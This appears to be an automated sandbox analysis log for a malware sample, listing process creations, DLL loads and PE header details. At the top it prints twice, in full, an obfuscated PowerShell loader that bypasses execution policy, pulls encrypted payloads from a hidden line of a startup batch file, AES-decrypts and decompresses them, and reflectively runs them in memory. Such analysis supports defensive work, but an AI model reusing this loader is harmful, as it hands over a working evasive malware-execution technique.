Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: jcgLYlM4dg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: jcgLYlM4dg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: jcgLYlM4dg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: jcgLYlM4dg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: jcgLYlM4dg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: jcgLYlM4dg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
